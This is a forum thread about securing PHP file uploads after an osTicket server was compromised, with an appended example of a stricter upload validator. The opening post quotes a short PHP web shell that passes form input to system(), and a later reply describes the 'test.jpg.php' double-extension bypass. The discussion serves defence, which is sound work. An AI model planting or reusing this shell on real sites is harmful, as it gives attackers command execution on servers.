  1. #1
    bloo_fish

    PHP uploads security problem

    Hey, I was osticket and somebody had uploaded a PHP file that gave them command-line access.

    They used a script similar to this, I think:

    PHP Code:
    <?PHP
    echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
    if (!$cmd) die;
    system($cmd);
    ?>
    after a quick browse on the net. What I want to know is how can I stop this happening again. I have disabled all uploads through osticket, so that should stop it for now.

    Thanks for any help

  2. #2
    neoblast007
    You can just validate what type of file is being uploaded onto your system by checking the MIME type and only allowing certain types, like:

    images/jpegs


  3. #3
    bloo_fish
    Quote Originally Posted by neoblast007
    You can just validate what type of file is being uploaded onto your system by checking the MIME type and only allowing certain types, like:

    images/jpegs

    But is there a way to disable PHP, Perl etc. from being able to do this, preferably through Apache so it can stop all languages from doing it?

    Thanks for the response though

  4. #4
    Cam
    Stop PHP and Perl being able to do what? Check MIME types?

  5. #5
    psn
    You may wanna take a look at this: http://au.php.net/ini-set

    Set it to 0m as you cannot turn file uploads without php.ini or httpd.conf access.

  6. #6
    bloo_fish
    Quote Originally Posted by psn
    You may wanna take a look at this: http://au.php.net/ini-set

    Set it to 0m as you cannot turn file uploads without php.ini or httpd.conf access.
    Thank you for the response, but what exactly do I set to 0m?

    I have also found http://www.modsecurity.org/ which looks like it sets Apache to only allow uploads of image file types.

  7. #7
    toasti
    Thanks for the modsecurity link. Some nice articles on security there too.

  8. #8
    Scott.Mc
    A lot of people use
    $var = explode(".", $var);
    $filetype = $var[1];

    This is what so many people use, but think about it:
    if I put test.jpg.php

    it will pass through easily, so you should replace the .php, .cgi, .pl etc. etc.
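An added example, not code from the thread or from osTicket: it puts the explode()-based check quoted in post #8 beside a stricter version, and adds the server-side type check post #2 suggests (inspecting the file's bytes rather than the type the browser claims). The function names, the allowlist and the assumption that the upload directory is not served by PHP are mine.

```php
<?php
// Added example (not from the thread). Contrasts the weak extension check
// from post #8 with a stricter allowlist plus a server-side content check.

// The pattern quoted in post #8: it takes the text after the FIRST dot, so
// a name like "test.jpg.php" yields "jpg" and is accepted.
function weakExtension(string $name): string {
    $parts = explode('.', $name);
    return $parts[1] ?? '';
}

// Stricter: take the LAST extension, lowercase it, and compare it against
// an allowlist. "test.jpg.php" now yields "php" and is rejected.
function strictExtension(string $name): string {
    return strtolower(pathinfo($name, PATHINFO_EXTENSION));
}

function isAllowedImageUpload(string $tmpPath, string $clientName): bool {
    // Hypothetical allowlist for this example: extension => expected MIME type.
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png', 'gif' => 'image/gif'];
    $ext = strictExtension($clientName);
    if (!isset($allowed[$ext])) {
        return false;
    }
    // Do not trust $_FILES[...]['type']; the client sends that value.
    // Detect the type from the bytes on disk instead.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($tmpPath) !== $allowed[$ext]) {
        return false;
    }
    // getimagesize() returns false for anything that is not a parseable image.
    return getimagesize($tmpPath) !== false;
}

// Store under a server-generated name, never the client's. $uploadDir is
// assumed to be outside the web root, or a directory where Apache has PHP
// (and CGI) execution disabled, so an uploaded script is never run.
function storeUpload(string $tmpPath, string $clientName, string $uploadDir): ?string {
    if (!is_uploaded_file($tmpPath) || !isAllowedImageUpload($tmpPath, $clientName)) {
        return null;
    }
    $dest = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16))
          . '.' . strictExtension($clientName);
    return move_uploaded_file($tmpPath, $dest) ? $dest : null;
}

// Compare the two checks on the name from post #8.
var_dump(weakExtension('test.jpg.php'));
var_dump(strictExtension('test.jpg.php'));
```

In a real upload handler, call storeUpload() with $_FILES['userfile']['tmp_name'] and $_FILES['userfile']['name']; the extension check alone is not enough, because the content check is what catches a script renamed to .jpg.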

